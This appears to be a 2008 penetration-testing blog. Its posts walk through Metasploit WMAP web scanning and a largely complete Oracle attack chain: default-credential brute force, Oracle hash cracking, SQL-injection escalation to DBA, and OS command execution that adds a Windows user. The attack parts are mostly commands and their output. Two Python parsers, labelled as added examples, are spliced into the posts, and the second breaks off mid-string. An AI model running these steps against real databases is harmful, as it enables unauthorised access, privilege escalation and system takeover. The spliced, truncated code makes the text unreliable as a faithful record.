Monday, November 24, 2008

Metasploit and WMAP


What is WMAP

"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not built around any browser or spider for data capture and manipulation."

Getting it all up & running

Readme is here:
http://www.metasploit.com/dev/trac/browser/framework3/trunk/documentation/wmap.txt

Step 1: Download, patch, and install ratproxy
http://code.google.com/p/ratproxy/

Documentation: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Code (at time of this posting): http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz

Step 2: Run ratproxy and browse the site you are testing; this populates the database that WMAP will read its targets and site structure from.

**You'll need to create the database first.

msf > db_create wmaptest.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmaptest.db


Step 3: Run metasploit, load necessary plugins, and run the wmap modules.

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect wmaptest.db
[*] Successfully connected to the database
[*] File: wmaptest.db


Show the targets. This is populated by browsing a site with ratproxy.


msf > wmap_targets
[*] Usage: wmap_targets [options]
-h Display this help text
-p Print all available targets
-r Reload targets table
-s [id] Select target for testing

msf > wmap_targets -r
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0
[*] Done.



Select a target and run the print command again to ensure the right target was selected.


msf > wmap_targets -s 1
Host Port SSL
[*] => 1. 192.168.0.100 80
[*] 2. 64.233.187.99 80
[*] Done.


Display the website structure.

msf > wmap_website
[*] Website structure
[*] 192.168.0.100:80 SSL:0
ROOT_TREE
| web
| | css
| | +------gonav.css
| | web
| | | images
| | | +------storepic_4.jpg
| | | +------storepic_264.jpg
| | | +------20080717105615.jpg
| | | +------storepic_125.jpg
| | +------index.php
| | | pic
| | | | part
| | | | +------index_line_1.gif
| | | +------top_index.gif
| | | +------username.gif
| | | +------tail_bg.gif
| | | +------head_bg.gif
| | | +------login_bg.gif
[*] Done.



[*] Usage: wmap_run [options]
-h Display this help text
-t Show all matching exploit modules
-e Launch exploits against all matched targets

Show the available modules for wmap

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.30465912818909 seconds.
[*] Done.


Run wmap, then go get a (rum &) coke, because the directory bruteforce modules are going to take a while.

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 192.168.0.100:80
[*] Error: 192.168.0.100
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80/ may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 is running Apache/2.2.3 (CentOS)( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 192.168.0.100:80
[*] >> Exception during launch from auxiliary/scanner/http/wmap_vhost_scanner: The following options failed to validate: DOMAIN.
[*] Launching auxiliary/scanner/http/options WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80 is running Apache/2.2.3 (CentOS)
[*] FrontPage not found on http://192.168.0.100:80 [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR / against 192.168.0.100:80...
[-] Blank or default PATH set.
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR /web/ against 192.168.0.100:80...

---SNIP---

msf > wmap_reports
[*] Usage: wmap_reports [options]
-h Display this help text
-p Print all available reports
-s [id] Select report for display


Show available reports.

msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)
1. Sat Nov 22 22:37:04 -0500 2008 192.168.0.100,80,0
[*] Done.


Show your report.

msf > wmap_reports -s 1
WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /administrator/ Directory /administrator/ found. [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /class/ Directory /class/ found. [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY NAME: /db/ Directory /db/ found. [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY NAME: /error/ Directory /error/ found. [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY NAME: /icons/ Directory /icons/ found. [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY NAME: /includes/ Directory /includes/ found. [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY NAME: /js/ Directory /js/ found. [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY NAME: /manual/ Directory /manual/ found. [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY NAME: /template/ Directory /template/ found. [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY NAME: /upload/ Directory /upload/ found. [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY NAME: /usage/ Directory /usage/ found. [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY NAME: /web/class/ Directory /web/class/ found. [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY NAME: /web/css/ Directory /web/css/ found. [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY NAME: /web/db/ Directory /web/db/ found. [Sat Nov 22 23:01:26 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:26 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY DIR_LISTING: /web/web/pic/ Directory /web/web/pic/ discloses its contents. [Sat Nov 22 23:02:40 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.
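The report above is plain text in a fixed shape, so it can be triaged mechanically instead of read line by line. The following is an added example, not part of WMAP or the original post: it parses the report lines, pairs each DIRECTORY NAME with the RESP_CODE that follows it, and ranks the findings. SENSITIVE_DIRS, RISKY_METHODS and the severity mapping are my own hypothetical triage policy, and the sample report is a constructed subset of the lines shown above.

```python
import re

# Constructed sample: a subset of the WMAP report lines from the post above.
SAMPLE_REPORT = """\
WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.
"""

# Every report line has the shape "<SECTION> <KEY>: <value> [<timestamp>]".
LINE_RE = re.compile(r"^(?P<section>[A-Z_]+) (?P<key>[A-Z_]+): (?P<value>.*?) \[(?P<ts>[^\]]+)\]$")

# Hypothetical triage policy (mine, not WMAP's): directories worth a second look
# when they answer 200, and HTTP methods that should normally be disabled.
SENSITIVE_DIRS = {"/admin/", "/administrator/", "/db/", "/includes/", "/upload/", "/web/db/"}
RISKY_METHODS = {"TRACE", "PUT", "DELETE", "CONNECT"}
SEVERITY = {"PUT_ENABLED": "high", "DIR_LISTING": "medium"}


def parse_report(text):
    """Turn report text into {'server', 'methods', 'directories', 'vulns'}."""
    result = {"server": None, "methods": [], "directories": [], "vulns": []}
    pending = None  # the DIRECTORY NAME record waiting for its RESP_CODE line
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # console chatter such as "[*] Done."
        section, key, value, ts = m.group("section", "key", "value", "ts")
        if section == "WEB_SERVER" and key == "TYPE":
            result["server"] = value
        elif section == "WEB_SERVER" and key == "OPTIONS":
            result["methods"] = value.split(",")
        elif section == "DIRECTORY" and key == "NAME":
            # value looks like "/admin/ Directory /admin/ found."
            pending = {"path": value.split()[0], "status": None, "found": ts}
            result["directories"].append(pending)
        elif section == "DIRECTORY" and key == "RESP_CODE" and pending is not None:
            pending["status"] = int(value)
            pending = None
        elif section == "VULNERABILITY":
            # value looks like "/web/web/ Upload succeeded on /web/web/"
            path, _, message = value.partition(" ")
            result["vulns"].append({"type": key, "path": path, "message": message, "found": ts})
    return result


def triage(report):
    """Rank what the scan found as (severity, finding, path), most severe first."""
    findings = []
    for v in report["vulns"]:
        findings.append((SEVERITY.get(v["type"], "medium"), v["type"], v["path"]))
    for method in report["methods"]:
        if method in RISKY_METHODS:
            findings.append(("low", "METHOD_" + method, "/"))
    for d in report["directories"]:
        if d["status"] == 200 and d["path"] in SENSITIVE_DIRS:
            findings.append(("medium", "SENSITIVE_DIR", d["path"]))
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: (order[f[0]], f[2], f[1]))


if __name__ == "__main__":
    for sev, what, where in triage(parse_report(SAMPLE_REPORT)):
        print("%-6s %-14s %s" % (sev, what, where))
```

Feed it the full report and the PUT_ENABLED finding on /web/web/ comes out first, ahead of the directory listings and the open TRACE method.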


Finish your pwnage...errr pentest.
CG

Sunday, November 23, 2008

Getting your smartcard to work with Ubuntu


The big bummer of Common Access Cards (CAC) is that there hasn't been a really good solution for getting them working in Linux. I've seen it done for OS X but not for Linux. Well, the guys over at HR Geeks did a writeup on how to get it working; worth a look if you have made the jump to being full-time Linux.

http://www.hrgeeks.com/2008/11/21/using-a-dod-cac-with-ubuntu-and-firefox/
CG

Oracle Pwnage Part 5 -- Password Cracking with JTR


Thanks to dentonj for pointing out to me that there was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...


CG

Saturday, November 22, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 4


Thank MC for this one...

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.102.130 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module uses a list of well known authentication credentials for
bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable
SID => unbreakable
msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >
CG

Friday, November 21, 2008

Metasploit Adobe util.printf() Client-side Exploit Video


A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.

Sorry, no audio. You'll just have to follow along.


Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

**P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You also click the link below the video for bigger view.
CG

Wednesday, November 19, 2008

Oracle Pwnage Part 3


Sorry no metasploit for this one.

But

I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post, but by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm

Second thing: you may find yourself with some Oracle hashes after some crafty (well, not really) SQL queries. They probably look something like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from red-database security. http://www.red-database-security.com/software/checkpwd.html

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5
CG

Monday, November 17, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 2


Last post we got to where we could execute SQL queries on the box and were able to see Scott's permissions.

Let's use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott's account.

As you recall....

msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed

Let's try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module)

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/
use auxiliary/sqli/oracle/ctxsys_driload
use auxiliary/sqli/oracle/dbms_export_extension
use auxiliary/sqli/oracle/dbms_metadata
use auxiliary/sqli/oracle/lt_findricset
use auxiliary/sqli/oracle/pitrig_truncate

msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info

Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBA SCOTT no DB user to elevate to DBA.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will escalate a Oracle DB user to DBA by exploiting an
sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(dbms_export_extension) > run

[*] Sending package...
[*] Done...
[*] Sending body...
[*] Done...
[*] Sending declare...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >


Let's check...

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) >
**Same settings as before; check user's roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO <--New Privileges :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let's add Java privileges to the Scott account

msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
SQL => grant javasyspriv to SCOTT
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Done...
[*] Auxiliary module execution completed


Let's check to see if it worked

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO
[*] SCOTT,JAVASYSPRIV,NO,YES,NO <-- Yup it worked :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >


From there we can use the oracle_win32 auxiliary module to execute commands
http://metasploit.com/users/mc/oracle9i/oracle_win32.rb

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info

Name: Execute win32 OS commands
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- ------------- -------- -----------
CMD echo metasploit > %SYSTEMDRIVE%\\unbreakable.txt no The OS command to execute.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD "net user dba P@ssW0rd1234 /add"
CMD => net user dba P@ssW0rd1234 /add
msf auxiliary(oracle_win32) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_win32) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'net user dbaa P@ssW0rd1234 /add'
[*] Done...
[*] Auxiliary module execution completed


Or, since the module gives you no command output, you can confirm that commands are actually executing by pinging a host you control and watching for the ICMP:

msf auxiliary(oracle_win32) > set CMD "ping 192.168.100.50"
CMD => ping 192.168.100.50
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'ping 192.168.100.50'
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_win32) >


On the other end, run tcpdump and filter for ICMP:

sudo tcpdump -i eth0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
01:11:26.123515 IP 192.168.100.25 > 192.168.100.50: ICMP echo request, id 0, seq 8192, length 40
01:11:26.343528 IP 192.168.100.50 > 192.168.100.25: ICMP echo reply, id 0, seq 8192, length 40

---SNIP---

8 packets captured
8 packets received by filter
0 packets dropped by kernel


For the ninja shit, check out MC's demo text file.

**Issues: you can't see the output of your command, so you have to run things whose results you can observe some other way (the ping above, a file write, a new account); see the demo text file.

If you care to clean up, just revoke the DBA role and the Java role you granted (javasyspriv, above) with the oracle_sql module:

"revoke dba from scott"
"revoke javasyspriv from scott"

That's it!
CG

Sunday, November 16, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 1


Every so often you come across an open 1521 on a pentest.

1521/tcp open oracle

But what to do? There aren't a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know that's "tough" to do. Thankfully MC has done all the work for us and created the metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.

All the fun is available here: http://metasploit.com/users/mc/

We start with Oracle version enumeration:
http://metasploit.com/users/mc/oracle9i/oracle_version.rb

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the Oracle build.

msf auxiliary(oracle_version) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_version) > run

[*] Host 192.168.100.25 is running: 32-bit Windows: Version 9.2.0.1.0 - Production


Next step is to determine the SID that the Oracle instance is running as:
http://metasploit.com/users/mc/oracle9i/oracle_sid.rb

msf > use auxiliary/scanner/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the SID.

msf auxiliary(oracle_sid) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.100.25: UNLUCKYDB
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >


Next we use the oracle_sql module to execute SQL queries against the database. This is handy to 1) run SQL queries and 2) check privileges if you've managed to find some working passwords (hint):
http://metasploit.com/users/mc/oracle9i/oracle_sql.rb

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > info

Name: Run simple SQL against the Oracle instance
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
SQL select * from v$version no The SQL to execute.

Description:
This module will allow for simple sql statements to be execute
against a given oracle instance given the appropriate credentials.


msf auxiliary(oracle_sql) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_sql) > set SID UNLUCKYDB
SID => UNLUCKYDB
msf auxiliary(oracle_sql) > run

[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[*] Sending SQL...
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[-] undefined method `prepare' for #
[-] undefined method `each' for nil:NilClass
[*] Done...
[-] Auxiliary failed: NoMethodError undefined method `disconnect' for #
[-] Call stack:
[-] (eval):48:in `run'
[*] Auxiliary module execution completed


WTF! No FTW on that one. A Google of the ORA-12514 error hints at the Oracle instance not being set up correctly. Let's see if we can get some more info. Using tnscmd.pl (oldie but a goodie), let's see whether the status command gives us some additional information:

cg@WPAD:~/evil/db/oracle$ perl tnscmd.pl status -h 192.168.100.25
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.100.25:1521
writing 89 bytes
reading
. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
(PRMFILE=e:\oracle\ora92\network\admin\listener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580))
.5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxx.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW)
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=ab1.xxxxxx.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,
(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxxx.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=UNLUCKYDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,.........@
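The status response above is a nested (KEY=VALUE) descriptor wrapped in TNS framing bytes. As an added example, not code from tnscmd.pl or Metasploit, here is a parser for that format that pulls out the registered service names (the piece the next step needs) and flags what a listener audit would care about: no listener password (SECURITY=OFF) and the extra HTTP/FTP presentations. The sample response is reconstructed from the output above with the framing abbreviated and the hostname left masked as in the post.

```python
# Constructed sample: the descriptor from the tnscmd.pl status output above,
# joined onto one string, with the framing bytes abbreviated.
SAMPLE_STATUS = (
    "........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)"
    "(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)"
    "(LOGFILE=e:\\oracle\\ora92\\network\\log\\listener.log)(TRACING=off)(SNMP=OFF)(PID=1580))"
    ".5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(PRE=any)(SESSION=NS)"
    "(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=ab1.xxxxx.com)(PORT=1521))))),,"
    "(ENDPOINT=(HANDLER=(STA=ready)(PRE=http)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)"
    "(HOST=ab1.xxxxx.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,"
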